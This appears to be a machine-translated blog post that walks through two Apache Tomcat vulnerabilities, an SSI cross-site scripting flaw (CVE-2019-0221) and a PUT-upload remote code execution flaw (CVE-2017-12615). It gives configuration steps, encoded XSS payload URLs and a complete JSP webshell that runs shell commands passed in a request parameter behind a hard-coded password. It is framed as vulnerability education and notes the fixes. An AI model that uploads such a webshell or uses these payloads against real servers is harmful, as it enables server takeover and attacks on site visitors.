two
Simulate the entire vulnerability attack process, why the vulnerability arises, and how the Tomcat gods respond.
[Attack 1: XSS attack]
One, SSI technical description
The first vulnerability demonstrated is related to Tomcat’s SSI functionality. What is SSI
SSI technology, also known as Serve Side Includes, SSI (Server Side Includes) are instructions placed in HTML pages and evaluated on the server as the page is served. They allow you to add dynamically generated content to an existing HTML page without having to serve the entire page through CGI programs or other dynamic techniques. Use the default suffix.shtml for SSI technical files.
For example, we can place directives into existing HTML pages, for example:
! --#echo var="DATE_LOCAL" -->
Copy the code
When the page is executed, the following results are displayed
Sunday, 22-March-2020 18:28:54 GMT
Copy the code
One of the most common uses of SSI is to print the results of CGI programs, such as hit counters. About more details see the technology: httpd.apache.org/docs/curren…
2. Enable SSI for Tomcat
- To prepare the JRE and Tomcat environment, I selected “apache-tomcat-9.0.10”. Apache Tomcat 9.0.0.m1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93)
- Modify line 19 of conf/context.xml to enable permissions
<Context privileged="true">
Copy the code
- Modify conf\web. XML to enable SSI Servlet. This section of code is commented out by default, we can delete the comment, the code is 310-322 lines.
<servlet>
<servlet-name>ssi</servlet-name>
<servlet-class>
org.apache.catalina.ssi.SSIServlet
</servlet-class>
<init-param>
<param-name>buffered</param-name>
<param-value>1</param-value>
</init-param>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>expires</param-name>
<param-value>666</param-value>
</init-param>
<init-param>
<param-name>isVirtualWebappRelative</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>4</load-on-startup>
</servlet>
Copy the code
Remove lines 422-425 about THE SSI configuration
<servlet-mapping>
<servlet-name>ssi</servlet-name>
<url-pattern>*.shtml</url-pattern>
</servlet-mapping>
Copy the code
- Add the madashu_env.shtml (habitually named printenv.shtml) file to the ROOT directory, located in webapps /root/ssi /
<html><head><title></title><body> Echo: <! --#echo var="QUERY_STRING_UNESCAPED" --><br/><br/>Env: <! --#printenv -->
</body></html>
Copy the code
- Start Tomcat
Three, launch an attack
- Let’s enter the following URL to see what it looks like
http://localhost:8080/ssi/madashu_env.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EHello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94 %E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%3C/h1%3E%3Cbr/%3E%3Cbr/%3ECopy the code
http://localhost:8080/ssi/madashu_env.shtml?%3Cscript%3Ealert(%27Hello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%8 8%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%27)%3C/script%3ECopy the code
If the attack succeeds, the following page is displayed.
4. Source code analysis
Tomcat quickly fixed the bug after it was created, and we found the code fix submission record on Github: Click Commit
This is what SAO operation!! Entity!!
org.apache.catalina.ssi. SSIMediator
SSIPrintenv.java
Threat 2: Remote Code Execution
Next, I will briefly demonstrate the remote code execution vulnerability, which is a high-risk vulnerability. Even if it is not the default configuration, once the vulnerability exists, the attacker can successfully upload Webshell and control the server.
- Upload files using PUT and intercept requests in progress:
- Generate a malicious file and name it
jiansheng.jsp
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"% > < %! public static String excuteCmd(String c) {StringBuilder line = new StringBuilder(); try {Process pro = Runtime.getRuntime().exec(c); BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream())); String temp = null;while((temp = buf.readLine()) ! = null) {line.append(temp +"\\n"); }buf.close(); } catch (Exception e) {line.append(e.getMessage()); }returnline.toString(); } % > < %if("023".equals(request.getParameter("pwd")) &&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) +"</pre>"); }else{out.println(": -)"); } % >Copy the code
- The remote upload was successful, and now we can happily play in the Tomcat that is not our own
- The whole code is relatively simple and can be looked at
JspServlet.java
I’m not going to do the demo here. ** This vulnerability affects a very wide range, from 5.x to 9.x all shot. The best solution is to set readonly to true for DefaultServlet in conf/web.xml.
[Conclusion] Interest is the best teacher. We can improve ourselves more quickly standing on the shoulders of giants by seeing the pits and codes that big men have fallen off. Interested friends can look at the Tomcat has reported: tomcat.apache.org/security-9…. The two vulnerabilities in this demo are CVE-2019-0221 and CVE-2017-12615.
Thank you for your attention to the public number “code uncle”, or pay attention to my personal micro signal: QiaoJS (nickname: Jiansheng, remarks nuggets) we work together Java related exchange learning!
Wechat public number: code uncle ten years rong “code”, old “uncle” bloom
Phase to recommend
AI Learning Notes: Feature engineering
From tens of millions of data query to talk about the index structure and database principle
An Overview of Artificial Intelligence and machine Learning
The most powerful Java in-heap caching framework in history
SpringCloud Second Generation Field series (I) : Service registration and discovery using Nacos